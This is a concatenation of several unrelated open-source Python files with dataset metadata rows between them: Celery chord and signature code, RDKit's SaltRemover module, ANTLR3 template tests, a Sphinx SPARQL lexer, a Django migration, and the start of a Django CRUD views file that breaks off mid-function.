if not isinstance(self.tasks, group):
self.tasks = group(self.tasks, app=self.app)
header_result = self.tasks.freeze(
parent_id=parent_id, root_id=root_id, chord=self.body)
bodyres = self.body.freeze(_id, root_id=root_id)
# we need to link the body result back to the group result,
# but the body may actually be a chain,
# so find the first result without a parent
node = bodyres
seen = set()
while node:
if node.id in seen:
raise RuntimeError('Recursive result parents')
seen.add(node.id)
if node.parent is None:
node.parent = header_result
break
node = node.parent
self.id = self.tasks.id
return bodyres
def apply_async(self, args=(), kwargs={}, task_id=None,
producer=None, publisher=None, connection=None,
router=None, result_cls=None, **options):
kwargs = kwargs or {}
args = (tuple(args) + tuple(self.args)
if args and not self.immutable else self.args)
body = kwargs.pop('body', None) or self.kwargs['body']
kwargs = dict(self.kwargs['kwargs'], **kwargs)
body = body.clone(**options)
app = self._get_app(body)
tasks = (self.tasks.clone() if isinstance(self.tasks, group)
else group(self.tasks, app=app))
if app.conf.task_always_eager:
return self.apply(args, kwargs,
body=body, task_id=task_id, **options)
if len(self.tasks) == 1:
# chord([A], B) can be optimized as A | B
# - Issue #3323
return (self.tasks[0] | body).set(task_id=task_id).apply_async(
args, kwargs, **options)
# chord([A, B, ...], C)
return self.run(tasks, body, args, task_id=task_id, **options)
def apply(self, args=(), kwargs={}, propagate=True, body=None, **options):
body = self.body if body is None else body
tasks = (self.tasks.clone() if isinstance(self.tasks, group)
else group(self.tasks, app=self.app))
return body.apply(
args=(tasks.apply(args, kwargs).get(propagate=propagate),),
)
def _traverse_tasks(self, tasks, value=None):
stack = deque(list(tasks))
while stack:
task = stack.popleft()
if isinstance(task, group):
stack.extend(task.tasks)
else:
yield task if value is None else value
def __length_hint__(self):
return sum(self._traverse_tasks(self.tasks, 1))
def run(self, header, body, partial_args, app=None, interval=None,
countdown=1, max_retries=None, eager=False,
task_id=None, **options):
app = app or self._get_app(body)
group_id = header.options.get('task_id') or uuid()
root_id = body.options.get('root_id')
body.chord_size = self.__length_hint__()
options = dict(self.options, **options) if options else self.options
if options:
options.pop('task_id', None)
body.options.update(options)
results = header.freeze(
group_id=group_id, chord=body, root_id=root_id).results
bodyres = body.freeze(task_id, root_id=root_id)
parent = app.backend.apply_chord(
header, partial_args, group_id, body,
interval=interval, countdown=countdown,
options=options, max_retries=max_retries,
result=results)
bodyres.parent = parent
return bodyres
def clone(self, *args, **kwargs):
s = Signature.clone(self, *args, **kwargs)
# need to make copy of body
try:
s.kwargs['body'] = maybe_signature(s.kwargs['body'], clone=True)
except (AttributeError, KeyError):
pass
return s
def link(self, callback):
self.body.link(callback)
return callback
def link_error(self, errback):
self.body.link_error(errback)
return errback
def set_immutable(self, immutable):
# changes mutability of header only, not callback.
for task in self.tasks:
task.set_immutable(immutable)
def __repr__(self):
if self.body:
if isinstance(self.body, _chain):
return remove_repeating_from_task(
self.body.tasks[0]['task'],
'%({0} | {1!r})'.format(
self.body.tasks[0].reprcall(self.tasks),
chain(self.body.tasks[1:], app=self._app),
),
)
return '%' + remove_repeating_from_task(
self.body['task'], self.body.reprcall(self.tasks))
return '<chord without body: {0.tasks!r}>'.format(self)
@cached_property
def app(self):
return self._get_app(self.body)
def _get_app(self, body=None):
app = self._app
if app is None:
try:
tasks = self.tasks.tasks # is a group
except AttributeError:
tasks = self.tasks
app = tasks[0]._app
if app is None and body is not None:
app = body._app
return app if app is not None else current_app
tasks = getitem_property('kwargs.header', 'Tasks in chord header.')
body = getitem_property('kwargs.body', 'Body task of chord.')
def signature(varies, *args, **kwargs):
"""Create new signature.
- if the first argument is a signature already then it's cloned.
- if the first argument is a dict, then a Signature version is returned.
Returns:
Signature: The resulting signature.
"""
app = kwargs.get('app')
if isinstance(varies, dict):
if isinstance(varies, abstract.CallableSignature):
return varies.clone()
return Signature.from_dict(varies, app=app)
return Signature(varies, *args, **kwargs)
subtask = signature # noqa: E305 XXX compat
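# Usage sketch (added; ``tasks.add`` is a placeholder task name): each of
# these produces an equivalent Signature object::
#
#     signature('tasks.add', args=(2, 2))
#     signature({'task': 'tasks.add', 'args': (2, 2),
#                'kwargs': {}, 'options': {}})
#     signature(signature('tasks.add', args=(2, 2)))  # clones the original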
def maybe_signature(d, app=None, clone=False):
"""Ensure obj is a signature, or None.
Arguments:
d (Optional[Union[abstract.CallableSignature, Mapping]]):
Signature or dict-serialized signature.
app (celery.Celery):
App to bind signature to.
clone (bool):
            If *d* is already a signature, the signature
will be cloned when this flag is enabled.
Returns:
Optional[abstract.CallableSignature]
"""
if d is not None:
if isinstance(d, abstract.CallableSignature):
if clone:
d = d.clone()
elif isinstance(d, dict):
d = signature(d)
if app is not None:
d._app = app
return d
maybe_subtask = maybe_signature # noqa: E305 XXX compat
| gpl-3.0 | -1,338,796,040,118,273,500 | 34.671942 | 79 | 0.558406 | false | 4.071605 | false | false | false |
rvianello/rdkit | rdkit/Chem/SaltRemover.py | 2 | 9561 | #
# Copyright (c) 2010, Novartis Institutes for BioMedical Research Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Novartis Institutes for BioMedical Research Inc.
# nor the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Created by Greg Landrum, Dec 2006
#
import os
import re
from collections import namedtuple
from contextlib import closing
from rdkit import Chem, RDConfig
from rdkit.Chem.rdmolfiles import SDMolSupplier, SmilesMolSupplier
class InputFormat:
SMARTS = 'smarts'
MOL = 'mol'
SMILES = 'smiles'
def _smartsFromSmartsLine(line):
"""
Converts given line into a molecule using 'Chem.MolFromSmarts'.
"""
# Name the regular expression (better than inlining it)
whitespace = re.compile(r'[\t ]+')
# Reflects the specialisation of this method to read the rather unusual
# SMARTS files with the // comments.
line = line.strip().split('//')[0]
if line:
smarts = whitespace.split(line)
salt = Chem.MolFromSmarts(smarts[0])
if salt is None:
raise ValueError(line)
return salt
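# Illustration (added, not part of the RDKit source): a typical salt-definition
# line is a SMARTS pattern optionally followed by a ``//`` comment::
#
#     _smartsFromSmartsLine('[Cl,Br,I]  // halogens')  # -> query molecule
#     _smartsFromSmartsLine('// comment-only line')    # -> None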
def _getSmartsSaltsFromStream(stream):
"""
Yields extracted SMARTS salts from given stream.
"""
with closing(stream) as lines:
for line in lines:
smarts = _smartsFromSmartsLine(line)
if smarts:
yield smarts
def _getSmartsSaltsFromFile(filename):
"""
Extracts SMARTS salts from given file object.
"""
return _getSmartsSaltsFromStream(open(filename, 'r'))
class SaltRemover(object):
defnFilename = os.path.join(RDConfig.RDDataDir, 'Salts.txt')
def __init__(self, defnFilename=None, defnData=None, defnFormat=InputFormat.SMARTS):
if defnFilename:
self.defnFilename = defnFilename
self.defnData = defnData
self.salts = None
self.defnFormat = defnFormat
self._initPatterns()
def _initPatterns(self):
"""
>>> remover = SaltRemover()
>>> len(remover.salts)>0
True
Default input format is SMARTS
>>> remover = SaltRemover(defnData="[Cl,Br]")
>>> len(remover.salts)
1
>>> remover = SaltRemover(defnData="[Na+]\\nCC(=O)O", defnFormat=InputFormat.SMILES)
>>> len(remover.salts)
2
>>> from rdkit import RDLogger
>>> RDLogger.DisableLog('rdApp.error')
>>> remover = SaltRemover(defnData="[Cl,fail]")
Traceback (most recent call last):
...
ValueError: [Cl,fail]
>>> RDLogger.EnableLog('rdApp.error')
"""
if self.defnData:
from rdkit.six.moves import cStringIO as StringIO
inF = StringIO(self.defnData)
with closing(inF):
self.salts = []
for line in inF:
if line:
if self.defnFormat == InputFormat.SMARTS:
salt = _smartsFromSmartsLine(line)
elif self.defnFormat == InputFormat.SMILES:
salt = Chem.MolFromSmiles(line)
else:
raise ValueError('Unsupported format for supplier.')
if salt is None:
raise ValueError(line)
self.salts.append(salt)
else:
if self.defnFormat == InputFormat.SMARTS:
self.salts = [mol for mol in _getSmartsSaltsFromFile(self.defnFilename)]
elif self.defnFormat == InputFormat.MOL:
self.salts = [mol for mol in SDMolSupplier(self.defnFilename)]
elif self.defnFormat == InputFormat.SMILES:
self.salts = [mol for mol in SmilesMolSupplier(self.defnFilename)]
else:
raise ValueError('Unsupported format for supplier.')
def StripMol(self, mol, dontRemoveEverything=False):
"""
>>> remover = SaltRemover(defnData="[Cl,Br]")
>>> len(remover.salts)
1
>>> mol = Chem.MolFromSmiles('CN(C)C.Cl')
>>> res = remover.StripMol(mol)
>>> res is not None
True
>>> res.GetNumAtoms()
4
Notice that all salts are removed:
>>> mol = Chem.MolFromSmiles('CN(C)C.Cl.Cl.Br')
>>> res = remover.StripMol(mol)
>>> res.GetNumAtoms()
4
Matching (e.g. "salt-like") atoms in the molecule are unchanged:
>>> mol = Chem.MolFromSmiles('CN(Br)Cl')
>>> res = remover.StripMol(mol)
>>> res.GetNumAtoms()
4
>>> mol = Chem.MolFromSmiles('CN(Br)Cl.Cl')
>>> res = remover.StripMol(mol)
>>> res.GetNumAtoms()
4
Charged salts are handled reasonably:
>>> mol = Chem.MolFromSmiles('C[NH+](C)(C).[Cl-]')
>>> res = remover.StripMol(mol)
>>> res.GetNumAtoms()
4
Watch out for this case (everything removed):
>>> remover = SaltRemover()
>>> len(remover.salts)>1
True
>>> mol = Chem.MolFromSmiles('CC(=O)O.[Na]')
>>> res = remover.StripMol(mol)
>>> res.GetNumAtoms()
0
dontRemoveEverything helps with this by leaving the last salt:
>>> res = remover.StripMol(mol,dontRemoveEverything=True)
>>> res.GetNumAtoms()
4
but in cases where the last salts are the same, it can't choose
between them, so it returns all of them:
>>> mol = Chem.MolFromSmiles('Cl.Cl')
>>> res = remover.StripMol(mol,dontRemoveEverything=True)
>>> res.GetNumAtoms()
2
"""
strippedMol = self._StripMol(mol, dontRemoveEverything)
return strippedMol.mol
def StripMolWithDeleted(self, mol, dontRemoveEverything=False):
"""
Strips given molecule and returns it, with the fragments which have been deleted.
>>> remover = SaltRemover(defnData="[Cl,Br]")
>>> len(remover.salts)
1
>>> mol = Chem.MolFromSmiles('CN(C)C.Cl.Br')
>>> res, deleted = remover.StripMolWithDeleted(mol)
>>> Chem.MolToSmiles(res)
'CN(C)C'
>>> [Chem.MolToSmarts(m) for m in deleted]
['[Cl,Br]']
>>> mol = Chem.MolFromSmiles('CN(C)C.Cl')
>>> res, deleted = remover.StripMolWithDeleted(mol)
>>> res.GetNumAtoms()
4
>>> len(deleted)
1
>>> deleted[0].GetNumAtoms()
1
>>> Chem.MolToSmiles(deleted[0])
'Cl'
Multiple occurrences of 'Cl' and without tuple destructuring
>>> mol = Chem.MolFromSmiles('CN(C)C.Cl.Cl')
>>> tup = remover.StripMolWithDeleted(mol)
>>> tup.mol.GetNumAtoms()
4
>>> len(tup.deleted)
1
>>> tup.deleted[0].GetNumAtoms()
1
    >>> Chem.MolToSmiles(tup.deleted[0])
'Cl'
"""
return self._StripMol(mol, dontRemoveEverything)
def _StripMol(self, mol, dontRemoveEverything=False):
def _applyPattern(m, salt, notEverything):
nAts = m.GetNumAtoms()
if not nAts:
return m
res = m
t = Chem.DeleteSubstructs(res, salt, True)
if not t or (notEverything and t.GetNumAtoms() == 0):
return res
res = t
while res.GetNumAtoms() and nAts > res.GetNumAtoms():
nAts = res.GetNumAtoms()
t = Chem.DeleteSubstructs(res, salt, True)
if notEverything and t.GetNumAtoms() == 0:
break
res = t
return res
StrippedMol = namedtuple('StrippedMol', ['mol', 'deleted'])
deleted = []
if dontRemoveEverything and len(Chem.GetMolFrags(mol)) <= 1:
return StrippedMol(mol, deleted)
modified = False
natoms = mol.GetNumAtoms()
for salt in self.salts:
mol = _applyPattern(mol, salt, dontRemoveEverything)
if natoms != mol.GetNumAtoms():
natoms = mol.GetNumAtoms()
modified = True
deleted.append(salt)
if dontRemoveEverything and len(Chem.GetMolFrags(mol)) <= 1:
break
if modified and mol.GetNumAtoms() > 0:
Chem.SanitizeMol(mol)
return StrippedMol(mol, deleted)
def __call__(self, mol, dontRemoveEverything=False):
"""
>>> remover = SaltRemover(defnData="[Cl,Br]")
>>> len(remover.salts)
1
>>> Chem.MolToSmiles(remover.salts[0])
'Cl'
>>> mol = Chem.MolFromSmiles('CN(C)C.Cl')
>>> res = remover(mol)
>>> res is not None
True
>>> res.GetNumAtoms()
4
"""
return self.StripMol(mol, dontRemoveEverything=dontRemoveEverything)
# ------------------------------------
#
# doctest boilerplate
#
def _runDoctests(verbose=None): # pragma: nocover
import sys
import doctest
failed, _ = doctest.testmod(optionflags=doctest.ELLIPSIS, verbose=verbose)
sys.exit(failed)
if __name__ == '__main__': # pragma: nocover
_runDoctests()
| bsd-3-clause | 8,806,758,668,487,101,000 | 29.449045 | 88 | 0.65035 | false | 3.385623 | true | false | false |
africallshop/africallshop-iphone | submodules/externals/antlr3/runtime/Python/tests/t055templates.py | 16 | 11976 | import unittest
import textwrap
import antlr3
import antlr3.tree
import stringtemplate3
import testbase
import sys
import os
from StringIO import StringIO
class T(testbase.ANTLRTest):
def execParser(self, grammar, grammarEntry, input, group=None):
lexerCls, parserCls = self.compileInlineGrammar(grammar)
cStream = antlr3.StringStream(input)
lexer = lexerCls(cStream)
tStream = antlr3.CommonTokenStream(lexer)
parser = parserCls(tStream)
if group is not None:
parser.templateLib = group
result = getattr(parser, grammarEntry)()
if result.st is not None:
return result.st.toString()
return None
def testInlineTemplate(self):
grammar = textwrap.dedent(
r'''grammar T;
options {
language=Python;
output=template;
}
a : ID INT
-> template(id={$ID.text}, int={$INT.text})
"id=<id>, int=<int>"
;
ID : 'a'..'z'+;
INT : '0'..'9'+;
WS : (' '|'\n') {$channel=HIDDEN;} ;
'''
)
found = self.execParser(
grammar, 'a',
"abc 34"
)
self.failUnlessEqual("id=abc, int=34", found)
def testExternalTemplate(self):
templates = textwrap.dedent(
'''\
group T;
expr(args, op) ::= <<
[<args; separator={<op>}>]
>>
'''
)
group = stringtemplate3.StringTemplateGroup(
file=StringIO(templates),
lexer='angle-bracket'
)
grammar = textwrap.dedent(
r'''grammar T2;
options {
language=Python;
output=template;
}
a : r+=arg OP r+=arg
-> expr(op={$OP.text}, args={$r})
;
arg: ID -> template(t={$ID.text}) "<t>";
ID : 'a'..'z'+;
OP: '+';
WS : (' '|'\n') {$channel=HIDDEN;} ;
'''
)
found = self.execParser(
grammar, 'a',
"a + b",
group
)
self.failUnlessEqual("[a+b]", found)
def testEmptyTemplate(self):
grammar = textwrap.dedent(
r'''grammar T;
options {
language=Python;
output=template;
}
a : ID INT
->
;
ID : 'a'..'z'+;
INT : '0'..'9'+;
WS : (' '|'\n') {$channel=HIDDEN;} ;
'''
)
found = self.execParser(
grammar, 'a',
"abc 34"
)
self.failUnless(found is None)
def testList(self):
grammar = textwrap.dedent(
r'''grammar T;
options {
language=Python;
output=template;
}
a: (r+=b)* EOF
-> template(r={$r})
"<r; separator=\",\">"
;
b: ID
-> template(t={$ID.text}) "<t>"
;
ID : 'a'..'z'+;
WS : (' '|'\n') {$channel=HIDDEN;} ;
'''
)
found = self.execParser(
grammar, 'a',
"abc def ghi"
)
self.failUnlessEqual("abc,def,ghi", found)
def testAction(self):
grammar = textwrap.dedent(
r'''grammar T;
options {
language=Python;
output=template;
}
a: ID
-> { stringtemplate3.StringTemplate("hello") }
;
ID : 'a'..'z'+;
WS : (' '|'\n') {$channel=HIDDEN;} ;
'''
)
found = self.execParser(
grammar, 'a',
"abc"
)
self.failUnlessEqual("hello", found)
def testTemplateExpressionInAction(self):
grammar = textwrap.dedent(
r'''grammar T;
options {
language=Python;
output=template;
}
a: ID
{ $st = %{"hello"} }
;
ID : 'a'..'z'+;
WS : (' '|'\n') {$channel=HIDDEN;} ;
'''
)
found = self.execParser(
grammar, 'a',
"abc"
)
self.failUnlessEqual("hello", found)
def testTemplateExpressionInAction2(self):
grammar = textwrap.dedent(
r'''grammar T;
options {
language=Python;
output=template;
}
a: ID
{
res = %{"hello <foo>"}
%res.foo = "world";
}
-> { res }
;
ID : 'a'..'z'+;
WS : (' '|'\n') {$channel=HIDDEN;} ;
'''
)
found = self.execParser(
grammar, 'a',
"abc"
)
self.failUnlessEqual("hello world", found)
def testIndirectTemplateConstructor(self):
templates = textwrap.dedent(
'''\
group T;
expr(args, op) ::= <<
[<args; separator={<op>}>]
>>
'''
)
group = stringtemplate3.StringTemplateGroup(
file=StringIO(templates),
lexer='angle-bracket'
)
grammar = textwrap.dedent(
r'''grammar T;
options {
language=Python;
output=template;
}
a: ID
{
$st = %({"expr"})(args={[1, 2, 3]}, op={"+"})
}
;
ID : 'a'..'z'+;
WS : (' '|'\n') {$channel=HIDDEN;} ;
'''
)
found = self.execParser(
grammar, 'a',
"abc",
group
)
self.failUnlessEqual("[1+2+3]", found)
def testPredicates(self):
grammar = textwrap.dedent(
r'''grammar T3;
options {
language=Python;
output=template;
}
a : ID INT
-> {$ID.text=='a'}? template(int={$INT.text})
"A: <int>"
-> {$ID.text=='b'}? template(int={$INT.text})
"B: <int>"
-> template(int={$INT.text})
"C: <int>"
;
ID : 'a'..'z'+;
INT : '0'..'9'+;
WS : (' '|'\n') {$channel=HIDDEN;} ;
'''
)
found = self.execParser(
grammar, 'a',
"b 34"
)
self.failUnlessEqual("B: 34", found)
def testBacktrackingMode(self):
grammar = textwrap.dedent(
r'''grammar T4;
options {
language=Python;
output=template;
backtrack=true;
}
a : (ID INT)=> ID INT
-> template(id={$ID.text}, int={$INT.text})
"id=<id>, int=<int>"
;
ID : 'a'..'z'+;
INT : '0'..'9'+;
WS : (' '|'\n') {$channel=HIDDEN;} ;
'''
)
found = self.execParser(
grammar, 'a',
"abc 34"
)
self.failUnlessEqual("id=abc, int=34", found)
def testRewrite(self):
grammar = textwrap.dedent(
r'''grammar T5;
options {
language=Python;
output=template;
rewrite=true;
}
prog: stat+;
stat
: 'if' '(' expr ')' stat
| 'return' return_expr ';'
| '{' stat* '}'
| ID '=' expr ';'
;
return_expr
: expr
-> template(t={$text}) <<boom(<t>)>>
;
expr
: ID
| INT
;
ID: 'a'..'z'+;
INT: '0'..'9'+;
WS: (' '|'\n')+ {$channel=HIDDEN;} ;
COMMENT: '/*' (options {greedy=false;} : .)* '*/' {$channel = HIDDEN;} ;
'''
)
input = textwrap.dedent(
'''\
if ( foo ) {
b = /* bla */ 2;
return 1 /* foo */;
}
/* gnurz */
return 12;
'''
)
lexerCls, parserCls = self.compileInlineGrammar(grammar)
cStream = antlr3.StringStream(input)
lexer = lexerCls(cStream)
tStream = antlr3.TokenRewriteStream(lexer)
parser = parserCls(tStream)
result = parser.prog()
found = tStream.toString()
expected = textwrap.dedent(
'''\
if ( foo ) {
b = /* bla */ 2;
return boom(1) /* foo */;
}
/* gnurz */
return boom(12);
'''
)
self.failUnlessEqual(expected, found)
def testTreeRewrite(self):
grammar = textwrap.dedent(
r'''grammar T6;
options {
language=Python;
output=AST;
}
tokens {
BLOCK;
ASSIGN;
}
prog: stat+;
stat
: IF '(' e=expr ')' s=stat
-> ^(IF $e $s)
| RETURN expr ';'
-> ^(RETURN expr)
| '{' stat* '}'
-> ^(BLOCK stat*)
| ID '=' expr ';'
-> ^(ASSIGN ID expr)
;
expr
: ID
| INT
;
IF: 'if';
RETURN: 'return';
ID: 'a'..'z'+;
INT: '0'..'9'+;
WS: (' '|'\n')+ {$channel=HIDDEN;} ;
COMMENT: '/*' (options {greedy=false;} : .)* '*/' {$channel = HIDDEN;} ;
'''
)
treeGrammar = textwrap.dedent(
r'''tree grammar T6Walker;
options {
language=Python;
tokenVocab=T6;
ASTLabelType=CommonTree;
output=template;
rewrite=true;
}
prog: stat+;
stat
: ^(IF expr stat)
| ^(RETURN return_expr)
| ^(BLOCK stat*)
| ^(ASSIGN ID expr)
;
return_expr
: expr
-> template(t={$text}) <<boom(<t>)>>
;
expr
: ID
| INT
;
'''
)
input = textwrap.dedent(
'''\
if ( foo ) {
b = /* bla */ 2;
return 1 /* foo */;
}
/* gnurz */
return 12;
'''
)
lexerCls, parserCls = self.compileInlineGrammar(grammar)
walkerCls = self.compileInlineGrammar(treeGrammar)
cStream = antlr3.StringStream(input)
lexer = lexerCls(cStream)
tStream = antlr3.TokenRewriteStream(lexer)
parser = parserCls(tStream)
tree = parser.prog().tree
nodes = antlr3.tree.CommonTreeNodeStream(tree)
nodes.setTokenStream(tStream)
walker = walkerCls(nodes)
walker.prog()
found = tStream.toString()
expected = textwrap.dedent(
'''\
if ( foo ) {
b = /* bla */ 2;
return boom(1) /* foo */;
}
/* gnurz */
return boom(12);
'''
)
self.failUnlessEqual(expected, found)
if __name__ == '__main__':
unittest.main()
| gpl-2.0 | -1,143,290,094,031,287,800 | 22.574803 | 84 | 0.373079 | false | 4.388421 | true | false | false |
ktbs/ktbs | doc/ext/sparqllexer.py | 1 | 2068 | # -*- coding: utf-8 -*-
"""
sparqllexer
~~~~~~~~~~~
Extension to add a sparql lexer to Sphinx.
``http://sphinx.pocoo.org/ext/appapi.html?highlight=pygments#sphinx.application.Sphinx.add%5Flexer``
It uses Kier Davis's code: ``https://github.com/kierdavis/SparqlLexer``.
.. code-block:: sparql
    # an illustrative query (assumed example; the original source left a TODO here)
    SELECT ?subject ?label WHERE {
        ?subject rdfs:label ?label .
        FILTER regex(?label, "example")
    }
changelog
`````````
2013-21-21: pchampin: added incomplete support for functions
2012-11-27: pchampin: improved a number of token definition
"""
from pygments.lexer import RegexLexer, bygroups
from pygments.formatter import Formatter
from pygments.token import *
PREFIX = r"[a-zA-Z][-_a-zA-Z0-9]*"
NAME = r"[_a-zA-Z][-_a-zA-Z0-9]*"
class SparqlLexer(RegexLexer):
name = "Sparql"
aliases = ["sparql", "ttl"]
filenames = ["*.ttl"]
alias_filenames = ["*.txt"]
mimetypes = ["text/x-sparql", "text/sparql", "application/sparql"]
tokens = {
"root": [
(r"#.*\n", Comment.Single),
(r",|;|\.|\(|\)|\[|\]|\{|\}|\^\^", Punctuation),
("(%s)?\:(%s)?" % (PREFIX, NAME), Name.Tag),
(r"_\:%s" % NAME, Name.Variable),
(r"[\$\?]%s" % NAME, Name.Variable),
(r"<[^>]*>", Name.Constant),
(r"(['\"]).+\1", String.Double),
(r"\d+(\.\d*)?([eE][+\-]?\d+)?", Number),
(r"\.\d+([eE][+\-]?\d+)?", Number),
(r"\s+", Whitespace),
(r"true|false", Keyword.Constant),
(r"(?i)prefix|select|construct|ask|describe|where|from|as|graph|filter"
"|optional|a|union|not exists", Keyword.Reserved),
(r"(?i)distinct|reduced|group by|order by|limit|offset|asc|desc",
Keyword.Reserved),
(r"(?i)count|sum|avg|min|max|groupconcat|sample",
Keyword.Reserved),
(r"(?i)delete|insert|data|load|clear|create|drop|copy|move|add",
Keyword.Reserved),
(r"(?i)regex",
Keyword.Function),
(r"\+|-|\*|/|=|!|<|>|\&|\|", Punctuation),
(r".+", Error),
],
}
def setup(app):
# An instance of the lexer is required
sparqlLexer = SparqlLexer()
app.add_lexer('sparql', sparqlLexer)
| lgpl-3.0 | 289,398,559,870,036,500 | 28.971014 | 104 | 0.567215 | false | 3.005814 | false | false | false |
ddanier/django_price | django_price/migrations/0001_initial.py | 1 | 1972 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import datetime
class Migration(migrations.Migration):
dependencies = [
('contenttypes', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Tax',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=25)),
('created', models.DateTimeField(default=datetime.datetime.now, editable=False)),
('modified', models.DateTimeField(auto_now=True)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='LinearTax',
fields=[
('tax_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='django_price.Tax')),
('percent', models.DecimalField(max_digits=6, decimal_places=3)),
],
options={
'abstract': False,
},
bases=('django_price.tax',),
),
migrations.CreateModel(
name='MultiTax',
fields=[
('tax_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='django_price.Tax')),
],
options={
'abstract': False,
},
bases=('django_price.tax',),
),
migrations.AddField(
model_name='tax',
name='_poly_ct',
field=models.ForeignKey(related_name='+', editable=False, to='contenttypes.ContentType'),
),
migrations.AddField(
model_name='multitax',
name='taxes',
field=models.ManyToManyField(related_name='+', to='django_price.Tax'),
),
] | bsd-3-clause | 4,126,624,790,270,327,000 | 34.232143 | 145 | 0.525355 | false | 4.650943 | false | false | false |
MERegistro/meregistro | meregistro/apps/backend/views/crud.py | 1 | 6613 | # -*- coding: UTF-8 -*-
from django.http import HttpResponseRedirect
from django.core.urlresolvers import reverse
from meregistro.shortcuts import my_render
from apps.seguridad.decorators import login_required, credential_required
from django.core.paginator import Paginator
class CrudConfig:
def __init__(self, model_class, form_class, form_filter_class, template_dir):
self.model_class = model_class
self.form_class = form_class
self.form_filter_class = form_filter_class
self.template_dir = template_dir
from apps.registro.models import AutoridadCargo
from apps.registro.forms import AutoridadCargoForm, AutoridadCargoFormFilters
from apps.registro.models import Departamento
from apps.registro.forms import DepartamentoForm, DepartamentoFormFilters
from apps.registro.models import Localidad
from apps.registro.forms import LocalidadForm, LocalidadFormFilters
from apps.registro.models import Jurisdiccion
from apps.registro.forms import JurisdiccionForm, JurisdiccionFormFilters
from apps.registro.models import TipoGestion
from apps.registro.forms import TipoGestionForm, TipoGestionFormFilters
from apps.registro.models import TipoSubsidio
from apps.registro.forms import TipoSubsidioForm, TipoSubsidioFormFilters
from apps.registro.models import OrigenNorma
from apps.registro.forms import OrigenNormaForm, OrigenNormaFormFilters
from apps.registro.models import TipoNorma
from apps.registro.forms import TipoNormaForm, TipoNormaFormFilters
from apps.registro.models import TipoDomicilio
from apps.registro.forms import TipoDomicilioForm, TipoDomicilioFormFilters
from apps.registro.models import TipoCompartido
from apps.registro.forms import TipoCompartidoForm, TipoCompartidoFormFilters
from apps.registro.models import TipoConexion
from apps.registro.forms import TipoConexionForm, TipoConexionFormFilters
from apps.registro.models import TipoDependenciaFuncional
from apps.registro.forms import TipoDependenciaFuncionalForm, TipoDependenciaFuncionalFormFilters
from apps.titulos.models import Carrera
from apps.titulos.forms import CarreraForm, CarreraFormFilters
from apps.titulos.models import TipoTitulo
from apps.titulos.forms import TipoTituloForm, TipoTituloFormFilters
cruds = {
'autoridad_cargo': CrudConfig(AutoridadCargo, AutoridadCargoForm, AutoridadCargoFormFilters, 'backend/autoridad_cargo/'),
'departamento': CrudConfig(Departamento, DepartamentoForm, DepartamentoFormFilters, 'backend/departamento/'),
'localidad': CrudConfig(Localidad, LocalidadForm, LocalidadFormFilters, 'backend/localidad/'),
'jurisdiccion': CrudConfig(Jurisdiccion, JurisdiccionForm, JurisdiccionFormFilters, 'backend/jurisdiccion/'),
'tipo_gestion': CrudConfig(TipoGestion, TipoGestionForm, TipoGestionFormFilters, 'backend/tipo_gestion/'),
'tipo_subsidio': CrudConfig(TipoSubsidio, TipoSubsidioForm, TipoSubsidioFormFilters, 'backend/tipo_subsidio/'),
'origen_norma': CrudConfig(OrigenNorma, OrigenNormaForm, OrigenNormaFormFilters, 'backend/origen_norma/'),
'tipo_norma': CrudConfig(TipoNorma, TipoNormaForm, TipoNormaFormFilters, 'backend/tipo_norma/'),
'tipo_domicilio': CrudConfig(TipoDomicilio, TipoDomicilioForm, TipoDomicilioFormFilters, 'backend/tipo_domicilio/'),
'tipo_compartido': CrudConfig(TipoCompartido, TipoCompartidoForm, TipoCompartidoFormFilters, 'backend/tipo_compartido/'),
'tipo_conexion': CrudConfig(TipoConexion, TipoConexionForm, TipoConexionFormFilters, 'backend/tipo_conexion/'),
'tipo_dependencia_funcional': CrudConfig(TipoDependenciaFuncional, TipoDependenciaFuncionalForm, TipoDependenciaFuncionalFormFilters, 'backend/tipo_dependencia_funcional/'),
'carrera': CrudConfig(Carrera, CarreraForm, CarreraFormFilters, 'backend/carrera/'),
'tipo_titulo': CrudConfig(TipoTitulo, TipoTituloForm, TipoTituloFormFilters, 'backend/tipo_titulo/'),
}
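# Registering another model with the generic CRUD is a one-line addition
# (illustrative sketch; the Nivel model, forms and template directory below
# are hypothetical, not part of this code base):
#   cruds['nivel'] = CrudConfig(Nivel, NivelForm, NivelFormFilters,
#                               'backend/nivel/')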
ITEMS_PER_PAGE = 50
@credential_required('seg_backend')
def index(request, crud_name):
config = cruds[crud_name]
if request.method == 'GET':
form_filter = config.form_filter_class(request.GET)
else:
form_filter = config.form_filter_class()
q = build_query(form_filter, 1)
paginator = Paginator(q, ITEMS_PER_PAGE)
try:
page_number = int(request.GET['page'])
except (KeyError, ValueError):
